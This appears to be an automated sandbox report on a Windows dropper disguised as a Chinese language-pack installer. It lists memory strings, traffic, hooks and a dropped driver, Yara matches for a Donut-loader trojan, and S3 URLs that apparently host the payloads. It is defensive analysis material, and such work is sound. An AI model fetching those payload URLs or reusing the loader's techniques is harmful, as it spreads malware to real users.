Source: Microsoft_Xtools.exe, 00000013.00000003.2304631549.00000187C7E34000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://assets.activity.windows.com/v1/assets
Source: Microsoft_Xtools.exe, 00000013.00000003.2304631549.00000187C7E34000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://assets.activity.windows.com/v1/assets/$batch
Source: explorer.exe, 0000000C.00000000.1922009971.0000000007124000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3140182405.0000000007124000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg
Source: Microsoft_Xtools.exe, 00000013.00000003.2304631549.00000187C7E34000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bn2-df.notify.windows.com/v2/register/xplatform/device
Source: explorer.exe, 0000000C.00000002.3140182405.0000000007124000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
Source: explorer.exe, 0000000C.00000002.3140182405.0000000007124000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 0000000C.00000000.1922009971.0000000007124000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3140182405.0000000007124000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz
Source: explorer.exe, 0000000C.00000000.1922009971.0000000007124000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3140182405.0000000007124000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz-dark
Source: #U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe, 00000004.00000002.2312539451.00000000024F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/cps0%
Source: #U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe, 00000004.00000002.2312539451.00000000024F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/rpa0
Source: explorer.exe, 0000000C.00000002.3147490009.000000000BE53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3076946819.000000000BE52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.1927425047.000000000BE14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3076302062.000000000BE14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3076888030.000000000BE4C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com
Source: Microsoft_Xtools.exe, 00000013.00000003.2304631549.00000187C7E34000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://global.notify.windows.com/v2/register/xplatform/device
Source: Microsoft_Xtools.exe, 00000009.00000003.1777690969.000002A39D4D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://http:///WopiFrame.aspx?
Source: explorer.exe, 0000000C.00000002.3140182405.0000000007124000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 0000000C.00000000.1922009971.0000000007124000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3140182405.0000000007124000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAzME7S.img
Source: explorer.exe, 0000000C.00000002.3148078606.000000000BFFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3075203061.000000000BFFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.1928031311.000000000BFFC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://java.c
Source: explorer.exe, 0000000C.00000002.3147490009.000000000BE53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3076946819.000000000BE52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.1927425047.000000000BE14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3076302062.000000000BE14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3076888030.000000000BE4C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.comP;
Source: explorer.exe, 0000000C.00000002.3147287649.000000000BE14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.1927425047.000000000BE14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3076302062.000000000BE14000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.com
Source: Microsoft_Xtools.exe, 00000013.00000003.2304631549.00000187C7E34000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ppe.activity.windows.com
Source: Microsoft_Xtools.exe, 00000013.00000003.2304631549.00000187C7E34000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ppe.assets.activity.windows.com
Source: Microsoft_Xtools.exe, 00000013.00000003.2304631549.00000187C7E34000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ppe.assets.activity.windows.com/v1/assets
Source: Microsoft_Xtools.exe, 00000013.00000003.2304631549.00000187C7E34000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ppe.assets.activity.windows.com/v1/assets/$batch
Source: #U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe, 00000004.00000002.2312539451.00000000023C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://priapic.s3.ap-east-1.amazonaws.com
Source: #U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe, 00000004.00000002.2312539451.0000000002462000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://priapic.s3.ap-east-1.amazonaws.com/MSVCP140.dll
Source: #U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe, 00000004.00000002.2312539451.00000000023C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://priapic.s3.ap-east-1.amazonaws.com/Microsoft_Xtools.exe
Source: #U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe, 00000004.00000002.2312539451.0000000002462000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://priapic.s3.ap-east-1.amazonaws.com/VCRUNTIME140.dll
Source: #U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe, 00000004.00000002.2312539451.0000000002462000.00000004.00000800.00020000.00000000.sdmp, #U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe, 00000004.00000002.2312539451.0000000002548000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://priapic.s3.ap-east-1.amazonaws.com/static.ini
Source: #U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe, 00000004.00000002.2312539451.0000000002548000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://priapic.s3.ap-east-1.amazonaws.com/statix
Source: #U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe, 00000004.00000002.2312539451.0000000002483000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://priapic.s3.ap-east-1.amazonaws.com/vcruntime140_1.dll
Source: #U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe, 00000004.00000002.2312539451.0000000002483000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://priapic.s3.ap-east-1.amazonaws.com/vcruntime140_1.dllT
Source: #U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe, 00000004.00000002.2312539451.0000000002462000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://priapic.s3.ap-east-1.amazonaws.com/view.res
Source: #U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe, 00000004.00000002.2312539451.000000000254E000.00000004.00000800.00020000.00000000.sdmp, #U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe, 00000004.00000002.2312539451.00000000024A9000.00000004.00000800.00020000.00000000.sdmp, #U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe, 00000004.00000002.2312539451.0000000002485000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://priapic.s3.ap-east-1.amazonaws.comD
Source: explorer.exe, 0000000C.00000000.1922009971.0000000007124000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3140182405.0000000007124000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 0000000C.00000000.1922009971.0000000007124000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3140182405.0000000007124000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 0000000C.00000000.1922009971.00000000071CB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/A
Source: explorer.exe, 0000000C.00000002.3140182405.00000000071CB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/G
Source: explorer.exe, 0000000C.00000002.3147490009.000000000BE53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3076946819.000000000BE52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.1927425047.000000000BE14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3076302062.000000000BE14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3076888030.000000000BE4C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.comZ
Source: #U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe, 00000004.00000002.2313605934.00000000033C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.globalsign.com/repository/0
Source: explorer.exe, 0000000C.00000000.1922009971.0000000007124000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3140182405.0000000007124000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/10-things-rich-people-never-buy-and-you-shouldn-t-ei
Source: explorer.exe, 0000000C.00000000.1922009971.0000000007124000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3140182405.0000000007124000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/money-matters-changing-institution-of-marriage/ar-AA
Source: explorer.exe, 0000000C.00000000.1922009971.0000000007124000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3140182405.0000000007124000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-
Source: explorer.exe, 0000000C.00000000.1922009971.0000000007124000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3140182405.0000000007124000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/savingandinvesting/americans-average-net-worth-by-age/ar-AA1h4ngF
Source: explorer.exe, 0000000C.00000000.1922009971.0000000007124000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3140182405.0000000007124000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameri
Source: explorer.exe, 0000000C.00000000.1922009971.0000000007124000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3140182405.0000000007124000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-
Source: explorer.exe, 0000000C.00000000.1922009971.0000000007124000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3140182405.0000000007124000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/trump-campaign-says-he-raised-more-than-45-million-in-3rd-qu
Source: explorer.exe, 0000000C.00000000.1922009971.0000000007124000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3140182405.0000000007124000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/technology/a-federal-emergency-alert-will-be-sent-to-us-phones-nation
Source: explorer.exe, 0000000C.00000000.1922009971.0000000007124000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3140182405.0000000007124000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/biden-administration-waives-26-federal-laws-to-allow-border-wall-c
Source: explorer.exe, 0000000C.00000000.1922009971.0000000007124000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3140182405.0000000007124000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
Source: explorer.exe, 0000000C.00000000.1922009971.0000000007124000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3140182405.0000000007124000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/world/us-supplies-ukraine-with-a-million-rounds-of-ammunition-seized-
Source: explorer.exe, 0000000C.00000000.1922009971.0000000007124000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3140182405.0000000007124000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/travel/news/you-can-t-beat-bobby-flay-s-phoenix-airport-restaurant-one-of-
Source: explorer.exe, 0000000C.00000000.1922009971.0000000007124000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3140182405.0000000007124000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/california-s-reservoirs-runneth-over-in-astounding-reve
Source: explorer.exe, 0000000C.00000000.1922009971.0000000007124000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3140182405.0000000007124000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: Microsoft_Xtools.exe, 00000009.00000003.1633472393.000002A39B54C000.00000004.00000020.00020000.00000000.sdmp, kitty.exe, 0000000E.00000000.2070770589.00007FF6F46C2000.00000020.00000001.01000000.00000012.sdmp	String found in binary or memory: https://www.overwolf.com
Source: Microsoft_Xtools.exe, 00000009.00000003.1633472393.000002A39B54C000.00000004.00000020.00020000.00000000.sdmp, kitty.exe, 0000000E.00000000.2070814421.00007FF6F46CC000.00000002.00000001.01000000.00000012.sdmp	String found in binary or memory: https://www.overwolf.com:

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown	Network traffic detected: HTTP traffic on port 49695 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49695
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49693
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49692
Source: unknown	Network traffic detected: HTTP traffic on port 49692 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49693 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49701

Source: unknown

HTTPS traffic detected: 3.5.237.40:443 -> 192.168.2.6:49692 version: TLS 1.2

Source: Microsoft_Xtools.exe, 00000009.00000003.1780225829.000002A39D4D2000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: DirectInput8Create

memstr_80535b83-b

Source: C:\Windows\explorer.exe

Windows user hook set: 0 mouse low level C:\Windows\SYSTEM32\DINPUT8.dll

Jump to behavior

Source: Microsoft_Xtools.exe, 00000009.00000003.1780225829.000002A39D4D2000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: GetRawInputData

memstr_233e3b0b-3

Source: Yara match	File source: 00000009.00000003.1780225829.000002A39D4D2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.1782816540.000002A39D4D3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.1781387142.000002A39D4DB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.1773029245.000002A39D4DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.2309579287.00000187C7E31000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.2894886210.000002A1A5F4D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.2899359895.000002A1A5F4B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.1770409862.000002A39D2D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.2305223765.00000187C7E3C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.1778381910.000002A39D4D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.2303072630.00000187C7E31000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.1784322808.000002A39D4D7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.2892830488.000002A1A5F4B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Microsoft_Xtools.exe PID: 7592, type: MEMORYSTR

System Summary

Malicious sample detected (through community Yara rule)

Source: sslproxydump.pcap, type: PCAP	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 4.2.#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe.37ba6c0.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 4.2.#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe.379d450.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000010.00000002.3133400888.000001A3542C0000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 0000000C.00000003.3075008585.000000000C131000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 0000000D.00000002.3132436281.0000000000600000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 0000000C.00000002.3148591529.000000000C0F8000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 0000000C.00000003.3075284546.000000000C0DC000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 0000000C.00000003.3075862798.000000000C0E5000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 0000000E.00000002.3133593277.0000000001013000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 0000000C.00000003.3075284546.000000000C0A9000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 0000000C.00000003.3075911766.000000000C0F1000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000004.00000002.2313605934.00000000034C5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 0000000C.00000002.3148264683.000000000C0A9000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown

Drops password protected ZIP file

Source: NOT-UTG-Q-1000.dat.9.dr	Zip Entry: encrypted
Source: NOT-UTG-Q-1000.dat.9.dr	Zip Entry: encrypted
Source: NOT-UTG-Q-1000.dat.9.dr	Zip Entry: encrypted
Source: NOT-UTG-Q-1000.dat.9.dr	Zip Entry: encrypted
Source: NOT-UTG-Q-1000.dat.9.dr	Zip Entry: encrypted
Source: NOT-UTG-Q-1000.dat.9.dr	Zip Entry: encrypted
Source: NOT-UTG-Q-1000.dat.9.dr	Zip Entry: encrypted

Source: C:\Windows\explorer.exe

Code function: 13_2_0062FC17 NtCreateSection,NtMapViewOfSection,VirtualAlloc,NtUnmapViewOfSection,NtMapViewOfSection,VirtualProtect,VirtualProtect,VirtualProtect,

13_2_0062FC17

Source: C:\Windows\explorer.exe

Code function: 13_2_0221C810: CreateFileA,DeviceIoControl,

13_2_0221C810

Source: C:\Windows\explorer.exe

File created: C:\ProgramData\kernelquick.sys

Jump to behavior

Source: C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe	Code function: 4_2_021EDFFC	4_2_021EDFFC
Source: C:\Windows\explorer.exe	Code function: 12_2_07B52270	12_2_07B52270
Source: C:\Windows\explorer.exe	Code function: 12_2_07B5EF70	12_2_07B5EF70
Source: C:\Windows\explorer.exe	Code function: 12_2_07B5B740	12_2_07B5B740
Source: C:\Windows\explorer.exe	Code function: 12_2_07B5D6B4	12_2_07B5D6B4
Source: C:\Windows\explorer.exe	Code function: 12_2_07B68E14	12_2_07B68E14
Source: C:\Windows\explorer.exe	Code function: 12_2_07B65C8C	12_2_07B65C8C
Source: C:\Windows\explorer.exe	Code function: 12_2_07B60C10	12_2_07B60C10
Source: C:\Windows\explorer.exe	Code function: 12_2_07B67408	12_2_07B67408
Source: C:\Windows\explorer.exe	Code function: 12_2_07B66440	12_2_07B66440
Source: C:\Windows\explorer.exe	Code function: 12_2_07B6A08C	12_2_07B6A08C
Source: C:\Windows\explorer.exe	Code function: 12_2_0AB92880	12_2_0AB92880
Source: C:\Windows\explorer.exe	Code function: 12_2_0ABA02FC	12_2_0ABA02FC
Source: C:\Windows\explorer.exe	Code function: 12_2_0ABA4BFC	12_2_0ABA4BFC
Source: C:\Windows\explorer.exe	Code function: 12_2_0ABA60AC	12_2_0ABA60AC
Source: C:\Windows\explorer.exe	Code function: 12_2_0ABAE6C8	12_2_0ABAE6C8
Source: C:\Windows\explorer.exe	Code function: 12_2_0ABA0F9C	12_2_0ABA0F9C
Source: C:\Windows\explorer.exe	Code function: 12_2_0ABA27D8	12_2_0ABA27D8
Source: C:\Windows\explorer.exe	Code function: 12_2_0ABAB750	12_2_0ABAB750
Source: C:\Windows\explorer.exe	Code function: 12_2_0ABAA404	12_2_0ABAA404
Source: C:\Windows\explorer.exe	Code function: 12_2_0ABAD450	12_2_0ABAD450
Source: C:\Windows\explorer.exe	Code function: 13_2_0062FC17	13_2_0062FC17
Source: C:\Windows\explorer.exe	Code function: 13_2_0062F7E7	13_2_0062F7E7
Source: C:\Windows\explorer.exe	Code function: 13_2_0062E52F	13_2_0062E52F
Source: C:\Windows\explorer.exe	Code function: 13_2_006306BF	13_2_006306BF
Source: C:\Windows\explorer.exe	Code function: 13_2_02207A20	13_2_02207A20
Source: C:\Windows\explorer.exe	Code function: 13_2_02207250	13_2_02207250
Source: C:\Windows\explorer.exe	Code function: 13_2_02206300	13_2_02206300
Source: C:\Windows\explorer.exe	Code function: 13_2_0221BB50	13_2_0221BB50
Source: C:\Windows\explorer.exe	Code function: 13_2_0221B3D0	13_2_0221B3D0
Source: C:\Windows\explorer.exe	Code function: 13_2_02210010	13_2_02210010
Source: C:\Windows\explorer.exe	Code function: 13_2_0220F710	13_2_0220F710
Source: C:\Windows\explorer.exe	Code function: 13_2_02201500	13_2_02201500
Source: C:\Windows\explorer.exe	Code function: 13_2_0222AB68	13_2_0222AB68
Source: C:\Windows\explorer.exe	Code function: 13_2_02209350	13_2_02209350
Source: C:\Windows\explorer.exe	Code function: 13_2_0222CB8C	13_2_0222CB8C
Source: C:\Windows\explorer.exe	Code function: 13_2_02208080	13_2_02208080
Source: C:\Windows\explorer.exe	Code function: 13_2_022279B0	13_2_022279B0
Source: C:\Windows\explorer.exe	Code function: 13_2_02202E40	13_2_02202E40
Source: C:\Windows\explorer.exe	Code function: 13_2_02217F00	13_2_02217F00
Source: C:\Windows\explorer.exe	Code function: 13_2_0220B440	13_2_0220B440
Source: C:\Windows\explorer.exe	Code function: 13_2_022275AC	13_2_022275AC
Source: C:\Windows\explorer.exe	Code function: 13_2_0220ADE0	13_2_0220ADE0
Source: C:\Users\user\4AAA4BEA-4B49-4018-AEDB-86BCC9AEB23A\kitty.exe	Code function: 14_2_00007FF8DC5DAED8	14_2_00007FF8DC5DAED8

Source: C:\Users\user\4AAA4BEA-4B49-4018-AEDB-86BCC9AEB23A\kitty.exe

Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7888 -s 368

Source: #U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe

Static PE information: invalid certificate

Source: #U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe, 00000004.00000000.1281835761.0000000000012000.00000002.00000001.01000000.00000004.sdmp	Binary or memory string: OriginalFilenameiclsProxy.dll vs #U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe
Source: #U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe, 00000004.00000000.1281835761.0000000000012000.00000002.00000001.01000000.00000004.sdmp	Binary or memory string: OriginalFilenameWeiTuoNew.exe0 vs #U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe
Source: #U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe, 00000004.00000002.2311279998.000000000064E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs #U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe
Source: #U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe, 00000004.00000002.2312539451.0000000002487000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamevcruntime140_1.dllT vs #U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe
Source: #U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe, 00000004.00000002.2312539451.000000000249B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamevcruntime140_1.dllT vs #U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe

Source: sslproxydump.pcap, type: PCAP	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 4.2.#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe.37ba6c0.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
